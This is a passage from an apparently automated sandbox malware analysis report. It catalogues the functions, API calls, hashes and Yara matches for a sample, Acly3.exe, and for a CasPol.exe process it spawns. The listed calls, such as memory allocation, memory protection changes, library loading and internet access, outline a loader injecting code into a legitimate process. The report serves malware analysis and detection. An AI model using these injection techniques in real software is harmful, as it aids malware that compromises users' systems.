                                                                            • API String ID: 1100898210-4017390910
                                                                            • Opcode ID: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction ID: 19c5699a9bb8b3376c06320bd1355d3f7d45777e2bc9a3354ca833756e7661a4
                                                                            • Opcode Fuzzy Hash: 14d9b0f9b7ecca22f0083886da8930ddd6c03ed0d6fdc94ff3a28603f1b7b4ab
                                                                            • Instruction Fuzzy Hash: 40E0EC3290212097C7615F55FE08B6E7B78AF49B26F05056AE884BB2628B746D428BDC
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00405F92, Relevance: 5.0, APIs: 4, Instructions: 37stringCOMMON
                                                                            Download Yara Rule
                                                                            C-Code - Quality: 100%
                                                                            			E00405F92(void* __ecx, CHAR* _a4, CHAR* _a8) {
				int _v8;
				int _t12;
				int _t14;
				int _t15;
				CHAR* _t17;
				CHAR* _t27;

				_t12 = lstrlenA(_a8);
				_t27 = _a4;
				_v8 = _t12;
				while(lstrlenA(_t27) >= _v8) {
					_t14 = _v8;
					 *(_t14 + _t27) =  *(_t14 + _t27) & 0x00000000;
					_t15 = lstrcmpiA(_t27, _a8);
					_t27[_v8] =  *(_t14 + _t27);
					if(_t15 == 0) {
						_t17 = _t27;
					} else {
						_t27 = CharNextA(_t27);
						continue;
					}
					L5:
					return _t17;
				}
				_t17 = 0;
				goto L5;
			}









                                                                            0x00405fa2
                                                                            0x00405fa4
                                                                            0x00405fa7
                                                                            0x00405fd3
                                                                            0x00405fac
                                                                            0x00405fb5
                                                                            0x00405fba
                                                                            0x00405fc5
                                                                            0x00405fc8
                                                                            0x00405fe4
                                                                            0x00405fca
                                                                            0x00405fd1
                                                                            0x00000000
                                                                            0x00405fd1
                                                                            0x00405fdd
                                                                            0x00405fe1
                                                                            0x00405fe1
                                                                            0x00405fdb
                                                                            0x00000000

                                                                            APIs
                                                                            • lstrlenA.KERNEL32(00000000,00000000,00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FA2
                                                                            • lstrcmpiA.KERNEL32(00000000,00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FBA
                                                                            • CharNextA.USER32(00000000), ref: 00405FCB
                                                                            • lstrlenA.KERNEL32(00000000,?,00000000,00406277,00000000,[Rename],00000000,00000000,00000000,?,?,?,?), ref: 00405FD4
                                                                            Memory Dump Source
                                                                            • Source File: 00000003.00000002.416752440.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000003.00000002.416746515.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416777900.0000000000408000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416787128.000000000040A000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416790388.000000000040D000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416802899.0000000000415000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416806904.000000000041B000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416819547.0000000000427000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416828805.0000000000431000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416833296.0000000000442000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000003.00000002.416840722.000000000044C000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: lstrlen$CharNextlstrcmpi
                                                                            • String ID:
                                                                            • API String ID: 190613189-0
                                                                            • Opcode ID: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction ID: bd09551308ad338638525116890fdadd4ab1f465f5503068af61de479685a4e4
                                                                            • Opcode Fuzzy Hash: 21d608d80335ac136f0ceeda94a64e737efc7ffd0529c55eb96d3cb5f29812e9
                                                                            • Instruction Fuzzy Hash: 34F0C231604418FFC7029BA5CD0099EBBA8EF06250B2140AAF840FB210D678DE019BA9
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Analysis Process: Acly3.exe PID: 2804 Parent PID: 2836 Acly3.exeCOMMON

                                                                            Executed Functions

                                                                            Function 00401724, Relevance: 4.5, APIs: 1, Strings: 1, Instructions: 965COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.680044969.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true
                                                                            • Associated: 00000004.00000002.680033916.0000000000400000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000004.00000002.680091430.0000000000422000.00000004.00020000.sdmp Download File
                                                                            • Associated: 00000004.00000002.680105357.0000000000423000.00000002.00020000.sdmp Download File
                                                                            • Associated: 00000004.00000002.680224294.000000000184E000.00000002.00020000.sdmp Download File
                                                                            Similarity
                                                                            • API ID: #100
                                                                            • String ID: VB5!6%*
                                                                            • API String ID: 1341478452-4246263594
                                                                            • Opcode ID: 240a76cf376abad16814bb0c64466c77f3da418e83fee7c55de29371a34508a9
                                                                            • Instruction ID: 431ee74642565b8c53f0595ec301911314ed8db7edf54d3cd12032d2623be713
                                                                            • Opcode Fuzzy Hash: 240a76cf376abad16814bb0c64466c77f3da418e83fee7c55de29371a34508a9
                                                                            • Instruction Fuzzy Hash: B972973115968A8FDB03EF74CAA5951FFB0FE2371032A1797C4958A0A3D324F52ACB56
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 003E1C59, Relevance: .0, Instructions: 38COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000004.00000002.679995330.00000000003E0000.00000040.00000001.sdmp, Offset: 003E0000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a2d6d05f13a44fe72d054e8d98ab29c4ea298ebd2e4dafa3a480db3d72ee2ad8
                                                                            • Instruction ID: 9697a33b59dd060b65cd28a0130f9d74a05fd948a95892cec8e4681b56ff0712
                                                                            • Opcode Fuzzy Hash: a2d6d05f13a44fe72d054e8d98ab29c4ea298ebd2e4dafa3a480db3d72ee2ad8
                                                                            • Instruction Fuzzy Hash: C4F0C033492B868BEF26E53A1C44499FB97FE972F4755075CC1D00F8E783136006A741
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Analysis Process: CasPol.exe PID: 672 Parent PID: 2804 CasPol.exeCOMMON

                                                                            Executed Functions

                                                                            Function 00572332, Relevance: 12.1, APIs: 1, Strings: 5, Instructions: 1620COMMON
                                                                            Download Yara Rule
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoadMemoryProtectVirtual
                                                                            • String ID: #~f#$&Ee$aC=e$d |f$n\\'
                                                                            • API String ID: 3389902171-2964783884
                                                                            • Opcode ID: 0f399eb9fb3f7b5005f5f664ac4065f5484067d7f749647f8be835907fb5f288
                                                                            • Instruction ID: 6585026d758669684b6d7b46ddc4adb5fdd8243f863623301bea95bbae9d97c2
                                                                            • Opcode Fuzzy Hash: 0f399eb9fb3f7b5005f5f664ac4065f5484067d7f749647f8be835907fb5f288
                                                                            • Instruction Fuzzy Hash: 6BD24671608386CFDF359E38C8947EA7FA2BF52360F55852EDC8A9B255D7308981DB02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00573C06, Relevance: 3.8, APIs: 1, Strings: 1, Instructions: 273networkCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: InternetOpen
                                                                            • String ID: 6"8_
                                                                            • API String ID: 2038078732-595991153
                                                                            • Opcode ID: ddffb61e4a1c5ae8f61ebd3df64c67fc75e4b09394ac26bf222e3492de3d1e40
                                                                            • Instruction ID: 033ef3eeaa1be99a136ac63c39d595037c15cf3fc6b4cb801cb6d851718cf7bc
                                                                            • Opcode Fuzzy Hash: ddffb61e4a1c5ae8f61ebd3df64c67fc75e4b09394ac26bf222e3492de3d1e40
                                                                            • Instruction Fuzzy Hash: 76A12535504345CFCF349E68E9987EA3BA2BF99360F65861BCC1E8B255D7308A45BF02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C6DF, Relevance: 1.7, APIs: 1, Instructions: 184memorynativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                              • Part of subcall function 00570275: LoadLibraryA.KERNEL32(?,?,?,005612B7,005614F7), ref: 0057057A
                                                                            • NtAllocateVirtualMemory.NTDLL(-30F81B36), ref: 0056C9E1
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: AllocateLibraryLoadMemoryVirtual
                                                                            • String ID:
                                                                            • API String ID: 2616484454-0
                                                                            • Opcode ID: 876ebc48a05155523ecbb6d5762ff70734fda8ddb98b5338c103e97091b26337
                                                                            • Instruction ID: 4439bc996f5ce0acfe1a3c57c1784216c7c0797c882ab2209bb78d58155ed856
                                                                            • Opcode Fuzzy Hash: 876ebc48a05155523ecbb6d5762ff70734fda8ddb98b5338c103e97091b26337
                                                                            • Instruction Fuzzy Hash: B95168312083498FDB749E6898A63FA3FA1FF85354F64091EDCCB9B260D73189469B02
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005735BC, Relevance: 1.5, APIs: 1, Instructions: 41nativeCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • NtProtectVirtualMemory.NTDLL(D528630F,?,?,?,?,005724B4,B309C73A,005693C0), ref: 005736AA
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: MemoryProtectVirtual
                                                                            • String ID:
                                                                            • API String ID: 2706961497-0
                                                                            • Opcode ID: 00984d62abaf5fff93baf3f747d54b6fd1cd7affb2d458906b97e5cde6030c4b
                                                                            • Instruction ID: 8d2ab28ebef50daa3bf2ee47a0b8b93b3c594c15f0193ae5c91885a86dc004ec
                                                                            • Opcode Fuzzy Hash: 00984d62abaf5fff93baf3f747d54b6fd1cd7affb2d458906b97e5cde6030c4b
                                                                            • Instruction Fuzzy Hash: 3101F2719843869FCB28CE18D915AEFBBA6EFD5354F56803EBC4A9B320CB705E05D640
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005636B4, Relevance: 3.6, APIs: 1, Strings: 1, Instructions: 117serviceCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • CloseServiceHandle.ADVAPI32 ref: 005636D0
                                                                            Strings
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CloseHandleService
                                                                            • String ID: [
                                                                            • API String ID: 1725840886-784033777
                                                                            • Opcode ID: 113fe4d99f4cd170e6ea5b9646355349d07aedab6da624c9248daf36ffcca2a6
                                                                            • Instruction ID: 62a83ff9e496782e1d1e970f5656148ea37733020031eb84e38833c3662cc1f4
                                                                            • Opcode Fuzzy Hash: 113fe4d99f4cd170e6ea5b9646355349d07aedab6da624c9248daf36ffcca2a6
                                                                            • Instruction Fuzzy Hash: 3A21CB7344A61ECFE71AAAA86C872D23FA09F1A630B641A9EC414DF8C3DB10C507D1C0
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0057227C, Relevance: 1.6, APIs: 1, Instructions: 132COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 10f3ac6953f4ff95882e3db882f1e8ba44d8322381f0e35b2fc0dacf2a564da1
                                                                            • Instruction ID: c841d31d04c81b6340e6e6f24d9385d9c07607fe25bbb85e80db758ca09a0195
                                                                            • Opcode Fuzzy Hash: 10f3ac6953f4ff95882e3db882f1e8ba44d8322381f0e35b2fc0dacf2a564da1
                                                                            • Instruction Fuzzy Hash: 77412A35608656DFCB248E28A8947FA2FE1BF95320F64D95EE84EC7285C6708941BB41
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C2EB, Relevance: 1.6, APIs: 1, Instructions: 93fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ef9a9199af6561b777f205407848708b998c65cbf5b1751cb000f34563877d2f
                                                                            • Instruction ID: 7845696d2993ed6730a5e32e2beb79fc3d74afa53a4f135beee3635b565ecdd7
                                                                            • Opcode Fuzzy Hash: ef9a9199af6561b777f205407848708b998c65cbf5b1751cb000f34563877d2f
                                                                            • Instruction Fuzzy Hash: 1F310773548309CFDB146E74999B2EA7BA1EF45750F96482ECCC6DB500D33189869B42
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C355, Relevance: 1.6, APIs: 1, Instructions: 78fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 1f1a2be6a3ff73acbfad22c4094ff547c1701c23a7ccc03b306395d9509cc241
                                                                            • Instruction ID: 057f759b692fcc9775328877ad40f713088fc2d323212bc9d474b5635ee40348
                                                                            • Opcode Fuzzy Hash: 1f1a2be6a3ff73acbfad22c4094ff547c1701c23a7ccc03b306395d9509cc241
                                                                            • Instruction Fuzzy Hash: 02212833649309CFDB14AE3459AA2D77BE1EF44750FA6481ECC8ADB504D33189425652
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C3A2, Relevance: 1.6, APIs: 1, Instructions: 73fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 3ac37dfd1f18b437fd0cec5f2a0b980ae822fbf3ed07a083cadf86ba1f70a729
                                                                            • Instruction ID: fc7a3151d203b0d5fa99f8d16b488fc9cd458c6e377881cdb45986dd826a5e8a
                                                                            • Opcode Fuzzy Hash: 3ac37dfd1f18b437fd0cec5f2a0b980ae822fbf3ed07a083cadf86ba1f70a729
                                                                            • Instruction Fuzzy Hash: 4511083354930ACFDB18BE685DAB6DA77E1EF44750FA5081ECC8ADB501D731C8425652
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C2E5, Relevance: 1.6, APIs: 1, Instructions: 67fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: c91795fb938d9d9bb85c3f453598590be214d9798bf2e7796f427769aca476c7
                                                                            • Instruction ID: 539aa5f001740514eaa919a9777aa256306af3f73842f20e15359fbc2b12e145
                                                                            • Opcode Fuzzy Hash: c91795fb938d9d9bb85c3f453598590be214d9798bf2e7796f427769aca476c7
                                                                            • Instruction Fuzzy Hash: 4D210372508305CFDB146E348A6A7FBBBB2BF91780F96891DCCC697900D3314A829B43
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00570275, Relevance: 1.6, APIs: 1, Instructions: 64libraryCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            • LoadLibraryA.KERNEL32(?,?,?,005612B7,005614F7), ref: 0057057A
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: LibraryLoad
                                                                            • String ID:
                                                                            • API String ID: 1029625771-0
                                                                            • Opcode ID: d3928c2e300c2f81981066bd1eee36789f6ec19a36e9b347dbaa02aed98a309f
                                                                            • Instruction ID: ebccb1960098d9884aa782e8025cbc10fb42775ff14e1c937ec0e944ea9b6ac3
                                                                            • Opcode Fuzzy Hash: d3928c2e300c2f81981066bd1eee36789f6ec19a36e9b347dbaa02aed98a309f
                                                                            • Instruction Fuzzy Hash: 1411CB70A48555DFCF789E2879687FE2ED27B84320F64E91AE84F871C4D6304A417B11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C40F, Relevance: 1.6, APIs: 1, Instructions: 57fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 93700e90e05674060e8d510ed1f1b30c40f9be64ec9c441909039c0981d92588
                                                                            • Instruction ID: 050c3febfa0bd2ad726c7e0803a7d23b49974aee5f0ee0cc073bb63c518bea5d
                                                                            • Opcode Fuzzy Hash: 93700e90e05674060e8d510ed1f1b30c40f9be64ec9c441909039c0981d92588
                                                                            • Instruction Fuzzy Hash: 9601C03364D209CFE718BE689C9B5DAB7E1EF08711FA14C2EC88ADB541D332C4869752
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C490, Relevance: 1.5, APIs: 1, Instructions: 39fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: 3c16859ffb0b76778a2851808d9c26e13b83db504f5f2726e06855158469ca1e
                                                                            • Instruction ID: 0fd0fe2910e424df48a29fe37c6af2168b601bc66ac5e49dc9d0e60afe00a3eb
                                                                            • Opcode Fuzzy Hash: 3c16859ffb0b76778a2851808d9c26e13b83db504f5f2726e06855158469ca1e
                                                                            • Instruction Fuzzy Hash: 56F05E33A8D5188EE759FF886CDB1CA7790EF08621FA0486EC80ADF142E732C81B5190
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C4D7, Relevance: 1.5, APIs: 1, Instructions: 35fileCOMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: CreateFile
                                                                            • String ID:
                                                                            • API String ID: 823142352-0
                                                                            • Opcode ID: ce88d741e433060a500e95ae5790596c6bfcf97f58aae07fadf5d173f3df7392
                                                                            • Instruction ID: 757096d9955c7da233105d2e7aa799771613424e0fc021229f506451eecad039
                                                                            • Opcode Fuzzy Hash: ce88d741e433060a500e95ae5790596c6bfcf97f58aae07fadf5d173f3df7392
                                                                            • Instruction Fuzzy Hash: 90E0C933A4D1298AE759BED87C9B0C97790DE099267600C6BC80ADE542DB22C4176194
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 005613CC, Relevance: 1.5, APIs: 1, Instructions: 20COMMON
                                                                            Download Yara Rule
                                                                            APIs
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID: EnumWindows
                                                                            • String ID:
                                                                            • API String ID: 1129996299-0
                                                                            • Opcode ID: 3fa4c536002543dbf52f266e15d47a8e792c736c64863e6bf7368b3664533b0a
                                                                            • Instruction ID: 9d3db4b17df0abd910effb4d1d9784d3853e136e7b04c12f3a7dd14d56bcc11e
                                                                            • Opcode Fuzzy Hash: 3fa4c536002543dbf52f266e15d47a8e792c736c64863e6bf7368b3664533b0a
                                                                            • Instruction Fuzzy Hash: DDD02E2660CAC30FC73696208C910B86F522AD7222B1EDE8AC8D707FD2C2284886C321
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Non-executed Functions

                                                                            Function 00570CCB, Relevance: .1, Instructions: 70COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: a8eaf81642d9164a50ead0cd17b2b1cda1171d2578059e831acd45d68fdc6590
                                                                            • Instruction ID: 139f3ad94af8d22062a0ada7f30314ac784e79f05b961342e3e8f7aacf4c14eb
                                                                            • Opcode Fuzzy Hash: a8eaf81642d9164a50ead0cd17b2b1cda1171d2578059e831acd45d68fdc6590
                                                                            • Instruction Fuzzy Hash: CF21F371615346CFCB38DF58DAA47E57BE0BF19310F185A6ADD6D8B282C330AE00EA11
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00567A91, Relevance: .0, Instructions: 49COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 28ce61d8e74937e60e4e46dac88e9cbbdd6d53e914ba28bc4620294e1ad7cf49
                                                                            • Instruction ID: 053bf315ab07f0d31b74ad734e3cdf3371375626c09f5a59b035a13274d81e69
                                                                            • Opcode Fuzzy Hash: 28ce61d8e74937e60e4e46dac88e9cbbdd6d53e914ba28bc4620294e1ad7cf49
                                                                            • Instruction Fuzzy Hash: AD01473651D289CFC71ADAF488D50C97FA0BF1A314718088AD0558FAD3E3208A07D304
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 00570114, Relevance: .0, Instructions: 8COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 7466ddd79fc491c5f0afbd73bfd29dbc2343b3ce96171def6879f5205e309316
                                                                            • Instruction ID: 7e60d7c82c9e39dbc92c8620aaa02ece8aaf44309fa8edf1c5a864c1b44d8877
                                                                            • Opcode Fuzzy Hash: 7466ddd79fc491c5f0afbd73bfd29dbc2343b3ce96171def6879f5205e309316
                                                                            • Instruction Fuzzy Hash: 82C04C781156C1CFC555DE04D550F6177F0B714740FD1A884D8468B651C614D840E500
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056C015, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                            • Instruction ID: f1647c15dfe5582e2114d8b48c9dc7a79c4e1b76aa7bcc19d5d00c5bce2ac4c7
                                                                            • Opcode Fuzzy Hash: 9553b201f40634b3f0bfaa8b0557a5c34869809b08848db32634946b51e74d60
                                                                            • Instruction Fuzzy Hash:
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%

                                                                            Function 0056B7B6, Relevance: .0, Instructions: 6COMMON
                                                                            Download Yara Rule
                                                                            Memory Dump Source
                                                                            • Source File: 00000009.00000002.679892617.0000000000560000.00000040.00000001.sdmp, Offset: 00560000, based on PE: false
                                                                            Yara matches
                                                                            Similarity
                                                                            • API ID:
                                                                            • String ID:
                                                                            • API String ID:
                                                                            • Opcode ID: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                            • Instruction ID: a026a310f9d08bb1d858143eb29fddbf5fc3d9bc52f9beb0b7c2352c6f2dcf67
                                                                            • Opcode Fuzzy Hash: e0ec8044d55284a10f5932728e6c4a76dbf9d83842d798d8e448099b51cb11e3
                                                                            • Instruction Fuzzy Hash: CDB002B66515819FEF56DB08D591B4073A4FB55648B0904D0E412DB712D224E910CA04
                                                                            Uniqueness

                                                                            Uniqueness Score: -1.00%